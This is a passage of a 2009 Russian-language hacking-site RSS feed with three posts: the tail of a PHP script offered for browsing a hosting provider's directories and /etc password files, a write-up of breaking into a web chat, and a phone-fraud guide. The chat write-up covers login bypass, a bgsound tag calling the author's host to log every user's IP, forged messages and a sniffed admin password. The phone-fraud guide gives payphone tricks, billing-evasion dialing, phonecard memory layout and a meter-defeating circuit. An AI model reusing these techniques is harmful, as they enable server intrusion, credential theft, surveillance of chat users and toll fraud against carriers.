&quot;&lt;INPUT TYPE=&apos;submit&apos; VALUE=&apos;Del&apos;&gt;&amp;#92;n&quot;; &lt;BR&gt;echo &quot;&lt;/FORM&gt;&amp;#92;n&quot;; &lt;BR&gt;?&gt; //говорим что PHP скрипт кончился&lt;BR&gt;&lt;BR&gt;Вот реализация скрипта, который позволяет вам получить доступ в каталоги провайдера, содержащиеся у него на винчестере. Потенциальная опасность применения данного скрипта в том, что злоумышленник получает практически всю информацию о сервере, также злоумышленник получает доступ к папки etc, где хранятся пароли. При проверке работоспособности скрипта и проверке на уязвимости было выявлено, что все сервера, на которых разрешён запуск PHP оказались подвержены данной атаке. Скрипт помещяется на сервер провайдера, где вам разрешен запуск PHP скриптов, в директорию домашней странички. По умолчанию скрипт просматривает все находящиеся файлы в той директории, куда он был загружен для того, чтобы попасть в корневой каталог сервера жмите на ссылку &quot;Подняться на каталог выше&quot; до тех пор, пока вы не увидите корневой каталог сервера. При выходе из вашей директории скрипт возможно сообщит вам о невозможности выйти из вашего каталога, это сообщение сервера игнорируйте и жмите на ссылку &quot;Подняться на каталог вверх&quot;, скрипт передаст данные серверу о том, что каталоги которые вы пытаетесь просмотреть являются вашими и вас пропустят.&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/2009-02-18-36</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/2009-02-18-36</guid>
			<pubDate>Wed, 18 Feb 2009 17:36:51 GMT</pubDate>
		</item>
		<item>
			<title>Взлом html-чатов</title>
			<description>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/permchat.jpg&quot;&gt;Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. &lt;BR&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/4-1.gif&quot;&gt;&lt;BR&gt;Начал я с малого. &lt;BR&gt;&lt;BR&gt;В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа &lt;input type=hidden name=cookie value=SP202134&amp;gt; (так в партизанах хранится UserID) &lt;BR&gt;&lt;BR&gt;Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа &lt;input type=text name=cookie value=SP202134&amp;gt; (что бы можно было их изменять) После этого делаем HTML документ для &quot;сборки чата&quot; из кусков. Т.е. примерно так &lt;BR&gt;&lt;BR&gt;  &quot;First.htm&quot;&lt;BR&gt;&lt;html&amp;gt;&lt;BR&gt;&lt;frameset rows=&quot;80%,20%&quot;&amp;gt;&lt;BR&gt;  &lt;frameset cols=&quot;70%,30%&quot;&amp;gt;&lt;BR&gt;  &lt;frame name=&quot;razg&quot;&lt;BR&gt;  src=&quot;http://ww...</description>
			<content:encoded>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/permchat.jpg&quot;&gt;Я предполагаю, что читатель знает, что такое CGI, и на этом построю своё объяснение. &lt;BR&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/4-1.gif&quot;&gt;&lt;BR&gt;Начал я с малого. &lt;BR&gt;&lt;BR&gt;В любом чате фрейм, в котором ты пишешь сообщения, генерится динамически (для каждого входящего) и, возможно, содержит несколько скрытых полей. Типа &lt;input type=hidden name=cookie value=SP202134&amp;gt; (так в партизанах хранится UserID) &lt;BR&gt;&lt;BR&gt;Идея в следующем: сохраняем содержимое этого фрейма на диске и исправляем его так, что бы можно было с ним работать со своего винта. Т.е. заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsk.su/cgi-bin/refresh.pl и вместо скрытых полей формы пишем типа &lt;input type=text name=cookie value=SP202134&amp;gt; (что бы можно было их изменять) После этого делаем HTML документ для &quot;сборки чата&quot; из кусков. Т.е. примерно так &lt;BR&gt;&lt;BR&gt;  &quot;First.htm&quot;&lt;BR&gt;&lt;html&amp;gt;&lt;BR&gt;&lt;frameset rows=&quot;80%,20%&quot;&amp;gt;&lt;BR&gt;  &lt;frameset cols=&quot;70%,30%&quot;&amp;gt;&lt;BR&gt;  &lt;frame name=&quot;razg&quot;&lt;BR&gt;  src=&quot;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+nocookie#end&quot;&amp;gt;&lt;BR&gt;  &lt;frame name=&quot;rigt&quot; src=&quot;http://www.chat.nsk.su/right.html&quot;&amp;gt;&lt;BR&gt;  &lt;/frameset&amp;gt;&lt;BR&gt;&lt;BR&gt;  &lt;frame name=&quot;bot&quot; src=&quot;start.htm&quot;&amp;gt;&lt;BR&gt;&lt;/frameset&amp;gt;&lt;BR&gt;&lt;/html&amp;gt;&lt;BR&gt;&lt;BR&gt;Start.htm - это и есть тот фрейм который я сохранил и изменил &lt;BR&gt;&lt;BR&gt;После этого я просто броузером открывал эту страницу (First.htm). И сразу(!!!) попадал в чат, минуя стандартную процедуру входа. Это позволило : &lt;BR&gt;1. Обходить зарегистрированные имена &lt;BR&gt;2. Прятать свой IP от киллеров, за счет взятия чужого ID&apos;a &lt;BR&gt;&lt;BR&gt;Дальше мне стало интересно вычислить IP участников. Я обнаружил, что не запрещён тэг &lt;bgsound src=&quot;&quot;&amp;gt;. Это позволило вставлять в своё сообщение ресурс со своей машины. Сам по себе звук на хер не нужен, но этот косяк позволил вставить в свой месс строку типа &lt;bgsound src=&quot;http://MyIP/cgi-bin/spy.exe&quot;&amp;gt;. Этот скрипт (spy.exe) вызывался с машины КАЖДОГО участника чата. Это позволило увидеть IP всех (скрипт просто сохранял мне на винт данные из переменной окружения REMOTE_ADDR). Это мне не очень понравилось, тк не понятно было где чей IP. Примерно в это-же время в чате появились приваты. Это значит, что документ в главном фрейме (тот где мессы все) стал называться по другому. &lt;BR&gt;&lt;BR&gt;До приватов : &lt;BR&gt;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor#end &lt;BR&gt;&lt;BR&gt;После появления приватов : &lt;BR&gt;http://www.chat.nsk.su/cgi-bin/refresh.cgi?win+razgovor+SP345678#end &lt;BR&gt;&lt;BR&gt;Где SP456789 - UserID &lt;BR&gt;&lt;BR&gt;После этого в скрипт (spy.exe) был добавлен вывод ID&apos;a из переменной окружения HTTP_REFERER Ну а сопоставить ник с ID&apos;ом не проблемма, тк ID каждого прописан там же примерно в такой строке &lt;BR&gt;  &lt;br&amp;gt;&lt;b&amp;gt;&lt;font color=yellow size=-1&amp;gt;Тут ник&lt;/font&amp;gt;&lt;/b&amp;gt;&lt;BR&gt;  &lt;font color=black&amp;gt;&lt;a href=&quot;https://xakerd.ucoz.ru/cgi-bin/private_form.cgi?SP448188&quot;&amp;gt;&lt;BR&gt;  &lt;img src=/img/mes.gif border=0 vspace=0&amp;gt;&lt;/a&amp;gt;&lt;/font&amp;gt;&lt;BR&gt;&lt;BR&gt;(Это строка взята из правого фрейма, где можно вызвать функцию &quot;Кто в чате&quot;) &lt;BR&gt;&lt;BR&gt;После этого перестало быть проблемой сопоставление ника и IP. Затем я решил позабавиться с приватами. &lt;BR&gt;&lt;BR&gt;Используя метод сохранения странички на винт (описанный выше), я получил форму для отправления приватов от КОГО-ТО КОМУ-ТО. Т.е. я смог в отсылаемом приватно сообщении проставлять имя отправителя. &lt;BR&gt;&lt;BR&gt;Осталось только одно. Я знал, что в чате есть киллеры, но ничего не знал про то, что это, где это, как это. Знал только, что для того, чтобы киллерствовать надо зайти на какую-то страничку. Очевидно, что в этой киллерской страничке показываются имена. Я предположил, что моё имя показываются таким, каким я его ввожу. Исходя из этого, я под именем &lt;bgsound src=&quot;http://MyIP/cgi-bin/spy.exe&quot;&amp;gt; MyNick зашел в чат (через прокси), и начал легонько ругаться (мне надо было, чтобы киллеры зашли на свою страничку). После этого (когда меня убили) я разгреб лог моего ВебСервера (OmniHTTPd beta) и увидел там обращение со страници не относящейся к известным мне страницам чата. Я полез на эту страницу и получил запрос на ввод пароля, со словами &quot;Дорогой администратор...&quot;. Это приятно согрело душу. Дальше я начал думать, то ли подобрать пароль, то ли ещё что придумать. Но ситуация так сложилась, что я оказался в одной сети с киллером, и, запустив сниффер, я поимел пароль. &lt;BR&gt;&lt;BR&gt;Ну вот и все. &lt;BR&gt;&lt;BR&gt;With best regards, Maveric. &lt;BR&gt;&lt;BR&gt;P.S. Ни один из этих приколов уже не работает в партизанах, т.к. это был &quot;дружественный взлом&quot; и обо всем, что я нашел, я рассказал создателю чата. Он все косяки исправил.&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/2009-02-18-35</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/2009-02-18-35</guid>
			<pubDate>Wed, 18 Feb 2009 17:31:59 GMT</pubDate>
		</item>
		<item>
			<title>Бесплатные звонки</title>
			<description>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/news_19339_2_2006-3-25.jpg&quot;&gt;Звонки по межгороду и с телефонов автоматов&lt;BR&gt;Старые телефоны-автоматы. Чтобы сделать устройство для бесплатных звонков по телефону-автомату, Вам потребуется кусок проволоки сантиметров 50 и металлический крокодильчик. Подойдет тот, который держит шторы на вашем окне. С одного конца провод совокупите с крокодильчиком, с другого оголите. Чтобы бесплатно поговорить:&lt;BR&gt;1) прицепите один конец провода к металлическому приемнику монет.&lt;BR&gt;2) Наберите нужный номер.&lt;BR&gt;3) Когда абонент возьмет трубку, и вы услышите характерный щелчок из голодного монетоприемника. Оголенный конец провода просуньте через отверстия телефонной трубки, так, чтобы он касался металлической части микрофона и не отпускайте его на протяжении всего разговора.&lt;BR&gt;УВЫ: действует это меньше чем на половине телефонов автоматах, поэтому придется побродить по разным переговорным пунктам в поисках нужных аппаратов.&lt;BR&gt;Есть ещё один способ. В монете или жетончике просверливается крохо...</description>
			<content:encoded>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/news_19339_2_2006-3-25.jpg&quot;&gt;Звонки по межгороду и с телефонов автоматов&lt;BR&gt;Старые телефоны-автоматы. Чтобы сделать устройство для бесплатных звонков по телефону-автомату, Вам потребуется кусок проволоки сантиметров 50 и металлический крокодильчик. Подойдет тот, который держит шторы на вашем окне. С одного конца провод совокупите с крокодильчиком, с другого оголите. Чтобы бесплатно поговорить:&lt;BR&gt;1) прицепите один конец провода к металлическому приемнику монет.&lt;BR&gt;2) Наберите нужный номер.&lt;BR&gt;3) Когда абонент возьмет трубку, и вы услышите характерный щелчок из голодного монетоприемника. Оголенный конец провода просуньте через отверстия телефонной трубки, так, чтобы он касался металлической части микрофона и не отпускайте его на протяжении всего разговора.&lt;BR&gt;УВЫ: действует это меньше чем на половине телефонов автоматах, поэтому придется побродить по разным переговорным пунктам в поисках нужных аппаратов.&lt;BR&gt;Есть ещё один способ. В монете или жетончике просверливается крохотное сквозное отверстие и продевается нитка. После провала монетки или жетона Вы можете вернуть его вытащив за нитку. Очень важно не изменить массу жетона при проделовании дырки. Так что дырка должна быть как можно меньше.&lt;BR&gt;Звонок по межгороду с домашнего телефона. Апробировано в течение двух лет в СНГ и шесть лет в европейских странах. Этот способ можно использовать только на длинных расстояниях, то есть при междугородней связи. Суть секрета основана на очень простой идее: Вы знаете, что когда вы набираете дисковым номеронабирателем (импульсная система набора) &quot;1&quot;, линия прерывается один раз, когда &quot;7&quot;, линия прерывается семь раз, когда &quot;0&quot; - 10 раз. Я стал наблюдать, что произойдет, если линию прервать более десяти pаз. Для реализации этой идеи, я использовал мой первый компьютер (8-ми битный &quot;Enterprise-128&quot; который имел разъем для программного контроля магнитофона), в моем случае вместо магнитофона была подключена телефонная линия. Короче, я не буду описывать все мои исследования для краткости изложения. Волшебным был номер &quot;15&quot;. Вот именно эти пятнадцать я и вставлял после 8. Вот так: 8 + гудок + пятнадцать + код страны + номер телефона и счета не приходят. Если Вы все поняли правильно, то должны были понять и то, что это число прерываний телефонной линии. Вот способ использования: 8+тон+волшебный номер 15+ код города + телефонный номер. Так, для бесплатного звонка в Москву по телефону 921-00-00, я набирал 8-волшебный номер 15 - 095-921-00-00. Я набирал &quot;8&quot; и ждал тонального сигнала для доступа на междугородную станцию, когда он приходил, я набирал 15 и тональный сигнал пропадал, тогда я набирал код города и телефонный номер. 15 это не 1 и 5, а пятнадцать прерываний телефонной сети, и если иметь достаточно выраженный музыкальный слух, то можно &quot;нащелкать&quot; эти 15 импульсов кнопкой &quot;сброс&quot; на обычном телефоне.&lt;BR&gt;Способ второй: звонишь по межгороду и после набора номера и/или во время разговора на параллельном дисковом телефоне вертишь диск. На некоторых АТС сбивается номер на АОНе и счет выставляется черти кому, на других счетчик минут обнуляется при щелчках. Некоторые АТС думают, что абонент вообще трубку положил! В общем надо пробовать, но на каждой АТС свой набор глюков...&lt;BR&gt;Взлом телефонных карточек.&lt;BR&gt;Не так давно на Российского потребителя обрушился целый поток новых платежных средств: таксофонные карты, магнитные карты метро, банковские карты и т.д, Коснемся пока только таксофонных карт. Наверное, каждый задавался вопросом, как же устроена и как работает таксофонная карта, и можно ли ее обмануть? Ответ на второй вопрос пока умолчим, а, вот, на первый попробуем ответить в доступной и популярной форме. Поскольку, при желании наиболее общую информацию можно найти в Интернете, то разговор пойдет конкретно про Таксофонные карты компании &quot;Санкт-Петербургские таксофоны&quot;.&lt;BR&gt;Таксофонная карта соответствует международному стандарту ISO 7816 в части 1и2. &lt;BR&gt;1808716-1:1987 &lt;BR&gt;Карточки идентификационные.&lt;BR&gt;Карточки на интегральных схемах с контактами.&lt;BR&gt;Часть 1. Физические характеристики.:&lt;BR&gt;СТК1 код В 4с. изд.1&lt;BR&gt;ISO 8716-2:1988 &lt;BR&gt;Карточки идентификационные.&lt;BR&gt;Карточки на интегральных схемах с контактами.&lt;BR&gt;Часть 2. Размеры и расположение контактов. &lt;BR&gt;СТК1 код D 7с. изд.1&lt;BR&gt;Кристалл на карте представляет собой электрически программируемое ПЗУ с последовательным побитным выводом информации, изготовленное по технологии NMOS. В этом ПЗУ используется 128 бит. Чтобы перепрограммировать карту, нужно стереть информацию из ПЗУ, но чип защищен от ультрафиолетового облучения специальной смолой. Даже если Вам удастся стереть чип, то нужно будет перепрограммировать специальную область производителя - первые 64 бита, а она защищена от записи плавким предохранителем, который пережигается на фабрике при производстве чипа. Основной способ обмана таксофонов - изготовление эмуляторов, т.е. устройств эмулирующих работу настоящей карты. Это довольно легко сделать на современных однокристальных микроЭВМ. Основной способ защиты таксофонов от таких эмуляторов - измерение межэлектродных сопротивлений, емкостей и сравнение их с номинальными, что позволяет таксофону отличить эмулятор от настоящей карты. Расположение и назначение контактов на карте (рис. 4):&lt;BR&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/xak_18.jpg&quot;&gt;&lt;BR&gt;&lt;/P&gt;&lt;P&gt;1 VCC=5V - Питание.&lt;BR&gt;2 Reset (входной) - Сигнал инициализации карты.&lt;BR&gt;3 Clk (входной) о Тактовые импульсы.&lt;BR&gt;4 Не используется.&lt;BR&gt;5 GND (земля).&lt;BR&gt;6 Не используется.&lt;BR&gt;7 I/O - (вход и выход) - Побитовый ввод и вывод с карты.&lt;BR&gt;8 Не используется.&lt;BR&gt;Все сигналы соответствуют ТТЛ уровням. Читатель должен обратить внимание, что центральная пластинка соединена с землей.&lt;BR&gt;Чтение информации с карты&lt;BR&gt;Внутри карточки находится счетчик адреса разрядностью 9 бит. То есть, после чтения каждых 512 бит все начинается сначала. Счетчик может быть только увеличен. Если Вы хотите считать бит с адресом меньше текущего, то счетчик нужно сбросить в 0, а затем увеличить до необходимого значения. Операция сброса выглядит так:&lt;BR&gt;- сначала необходимо установить высокий уровень сигнала Reset (2 контакт карты), а затем установить и сбросить сигнал Clk. После сброса сигнала Reset на выходе (7-ой контакт карты) будет доступен бит с адресом 0. Затем нужно подавать тактовые импульсы на вход Clk (3-ий контакт карты). По фронту импульса происходит увеличение на единицу внутреннего счетчика адреса. После спада тактового импульса на выходе появляется следующий бит данных. Обычно удобнее представлять информацию в виде байтов. Для этого каждые 8 считанных бит группируют в байт, считая, что первым считывается менее значащий бит. Таким образом, последовательно считывая 1,0,0,1,0,1,1,1, получим байт ОхЕ9.&lt;BR&gt;Чтение через параллельный порт компьютера&lt;BR&gt;Поскольку все сигналы соответствуют уровню ТТЛ, то логично использовать для чтения информации обыкновенный принтерный порт. Не думаю, что надо приводить здесь полное техническое описание работы параллельного .порта, назначение контактов и описание портов ввода-вывода - это все можно найти в специальной технической литературе. &lt;BR&gt;Аппаратные средства&lt;BR&gt;Большинство аппаратных средств включают в себя некую соединительную конструкцию, состоящую из ответной части разъема параллельного порта, монтажного провода и считывающего устройства в виде обыкновенного куска текстолита с отверстиями, в которые вставлены штырьки. Контакты параллельного порта соединяются с контактами карточки в соответствии с приведенной таблицей 3.&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;&lt;P&gt;Параллельный порт компьютера           Карточка&lt;BR&gt;&lt;/P&gt;&lt;P&gt;11: Busy (входной)                             7: I/O&lt;BR&gt;2: D0 (выходнной)                              2: Reset&lt;BR&gt;25: Gnd                                               5: Gnd&lt;BR&gt;3: D1 (выходной)                                &lt;BR&gt;3: CLK&lt;BR&gt;&lt;/P&gt;&lt;P&gt;таб.3&lt;BR&gt;В таблице 3 не указан контакт 1 карточки - питание +5В. Его можно, взять с разъема клавиатуры или просто от батарейки.&lt;BR&gt;Программные средства &lt;BR&gt;Используем порт LPT1. Запись в принтерный порт осуществляется через порт 0х378. Записанный байт появляется на выходных контактах. Мы используем бит 0 для сигнала Reset и бит 1 для сигнала Clk. Чтение выполняется .через порт 0х379. В самом старшем бите появится инвертированное значение с входного контакта 11 (Busy).&lt;BR&gt;Что записано на карте&lt;BR&gt;Мы подошли к самому интересному месту - назначению каждого бита, записанного на карте. Естественно, что на картах других городов это назначение будет другим, но мы, как обещали, говорим о питерских карточках. На карточке используются только 16 байт. Все остальные равны OxFF. В процессе исследований было считано около 300 карточек. &lt;BR&gt;Примеры памяти карт &lt;BR&gt;Допустим , что имеется карта на 50 единиц, и её срок действия закончился. Номер 0050415503.&apos; Годна до 30.09.98 &lt;BR&gt;E9,30,FF,01,F1,E2,80,CO 00,00,00,00,00,FF,18,EA &lt;BR&gt;Эта карта на 400 единиц также пуста. Номер 0400155921. Годна до 30.09.98 E9,30,FF,01,88,A7,9B,E8 Карта на 1000 единиц. Осталось 998. Номер 1000013039.&lt;BR&gt;Годна до 31.12.99 &lt;BR&gt;E9,30,FF,01,F7,3F,59,DC&lt;BR&gt;00,01,7F,OF,3F,FF,68,6B&lt;BR&gt;Допустим, что по этой карте был произведен звонок. Осталось 6 единиц.&lt;BR&gt;E9,30,FF,01,F7,3F,59,DC&lt;BR&gt;00,00,00,00,3F, FP, 68,6В&lt;BR&gt;Ещё звонок, и она закончилась.&lt;BR&gt;Е9. 30, FF,01, F7,3F,59, DC&lt;BR&gt;00,00,. 00.00.00. FF. 68.6В &lt;BR&gt;Назначение полей&lt;BR&gt;1. Первые 4 байта какой то идентификатор. На всех картах E9,30,FF,01. &lt;BR&gt;2 Следующие 4 байта - серийный номер карты. Расположив биты в байтах в обратном порядке, а затем и сами байты, получим 32 разрядное целое без знака. К примеру, байты F7, 3F, 59, DC с обратным порядком бит выглядят как EF, FC, 9A, 3В. Получим номер карты Ox3B9AFCEF или 1000013039 в десятичном виде. Нетрудно заметить, что номер, напечатанный на карте, всегда состоит из 10 цифр, а первые 4 цифры - емкость карточки. &lt;BR&gt;3. Следующие 5 байт - количество единиц, оставшихся на карточке. Формат хранения очень интересный: используется количество единичных битов в байте, начиная с младшего. Соответственно значение байта 07 соответствует 3 единицам, значение IF - пяти, a 7F - семи единицам. Максимальное количество единиц, хранящихся в байте - семь. Используется восьмеричная система счисления. Таким образом, байты 00, 01, 7F, OF, 3F соответствуют 01746 в восьмеричной системе или 998 единиц в десятичной системе. Максимальное количество единиц может выражаться числом 77777 в восьмеричной, или 32767 - в десятичной системе.&lt;BR&gt;4. Следующий байт всегда равен FF. Иногда он не используется. &lt;BR&gt;5. Два последних байта, по-видимому, выражают CRC или другой контрольный код для первых 8-ми постоянных байт, т.к. при расходовании единиц они не меняются, но на каждой карточке они свои. Пока их назначение не ясно. Обнаружилось, что срок годности не записан на карте. По всей видимости, он как-то связан с номером карты.&lt;BR&gt;Возможно, каждому сроку годности соответствуют определенный диапазон номеров.&lt;BR&gt;Как уже говорилось, из 10 цифр номера первые 4 выражают емкость карты.Оставшиеся 6 не идентифицируют карту однозначно, т.к. уже выпущено более миллиона карт. Всего при подобной системе нумерации может существовать 6 миллионов карт:&lt;BR&gt;на 25 единиц с номерами от 0025000000 до 0025999999, &lt;BR&gt;на 50 единиц с номерами от 0050000000 до 0050999999, &lt;BR&gt;на 100 единиц с номерами от 0100000000 до 0100999999, &lt;BR&gt;на 200 единиц с номерами от 0200000000 до 0200999999, &lt;BR&gt;на 400 единиц с номерами от 0400000000 до 0400999999, &lt;BR&gt;на 1000 единиц с номерами от 1000000000 до 1000999999.&lt;BR&gt;&lt;BR&gt;Интернет-телефония.&lt;BR&gt;Данная информация предназначена для бесплатных международных звонков при помощи Интернета. Необходимо: минимум 486sx - процессор, звуковая карта, Микрофон, колонки. Обеспечение: Win&apos;95, Интернет соединение, Internet Phone 5.0 (можно взять на www.vocaltec.com) Service for Internet Phone 5.0 (делаете себе на www.biztrans.com; www.deltathree.com) примечание: Последние два пункта требуют кредитные карты для регистрации. Интернет вы можете достать без денег, предлагаю написать - lirik_tnt@hotmail.com там Вам всегда помогут с интернет соединением за ничтожную сумму. После того, как у вас все есть, можно приступать к настройке. Запускаете IPhone 5.0, выбираете настройку &quot;services&quot; и устанавливаете ваш сервис, который вы приобрели на www.biztrans.com (или еще где нибуть), а именно это: имя, пароль, и небольшой фаил. Настройка так проста что у вас на будет проблем с этим этапом. Далее после того как вы все правильно сделали, вы попадаете обратно в iphone 5.0. Теперь осталось только набрать номер, а именно a-bbb xxxxxxx где a-код страны, bbb-код города, xxxxxxx-телефон абонента. e.g. 1-301 5702045 где 1-USA, 301-код города Baltimore, 5702045 - телефон. Ждите и можете говорить сколько влезет, ни вызываемый абонент, ни вы не заплатите ни цента.&lt;BR&gt;Как не платить за повременку.&lt;BR&gt;Сейчас во многих городах и весях начинают вводить и экспериментировать с повременной оплатой за местные телефонные переговоры. Это просто разорительно, тем более для тех кто пользуется Интернетом.&lt;BR&gt;Предлагаем опробовать следующий способ.&lt;BR&gt;Известно, что при соединении абонентов, напряжение в телефонной линии падает с 60 В до 5...8 В. Именно при данном напряжении включается детектор состояния линии и АТС начинает начислять за разговор денежки.&lt;BR&gt;Предлагаемая схема может работать не зависимо от того, местное или междугороднее соединение происходит. &lt;BR&gt;Однако, пока второй абонент не снял трубку напряжение в линии еще слишком высокое для срабатывания схемы. Таким образом, пока вы слышите сигнал вызова, деньги еще не начисляются, хотя реально соединение уже произошло.&lt;BR&gt;Все, что для этого нужно сделать - предотвратить падение напряжения в линии после снятия трубки вторым абонентом, удерживая его в пределах 21....36 В. Для этого применяется простейшая схема:&lt;BR&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/xak_19.jpg&quot;&gt; Для увеличения падения напряжения на стороне абонента, служит стабилитрон с напряжением стабилизации 12....30 В. Конденсатор, включенный параллельно стабилитрону служит для прохождения разговорного переменного тока, что повышает громкость разговора. Можно обойтись без диодного моста, но тогда устройство надо включать в соответствии с полярностью телефонной линии. Если вы используете модем, то для более четкой его работы можно зашунтировать диоды моста конденсаторами по 0,1 мкФ. Для голоса они не потребуются.&lt;BR&gt;Напряжение (тип) стабилитрона подбирается экспериментально в зависимости от конкретной АТС. Начните с большего напряжения. Уменьшайте его лишь до тех пор, пока станция не перестанет отрабатывать прекращение индукторного вызова. Дело в том, что оборудование определения состояния АТС имеет технологический &quot;зазор&quot; между напряжением прекращения вызова и разговорным напряжением для четкого срабатывания. Напряжение получившееся в результате подбора стабилитрона, должно как раз находиться посередине этого зазора. Таким образом, вызывная схема отключается, а схема счета времени еще не включается, что позволяет разговаривать бесплатно.&lt;BR&gt;АТС в это время думает, что второй абонент еще не снял трубку своего аппарата, а первый терпеливо ожидает, когда второй наконец проснется.&lt;BR&gt;Схема работает и на межгороде!&lt;BR&gt;Звоните на здоровье!&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/2009-02-18-34</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/2009-02-18-34</guid>
			<pubDate>Wed, 18 Feb 2009 17:18:30 GMT</pubDate>
		</item>
	</channel>
</rss>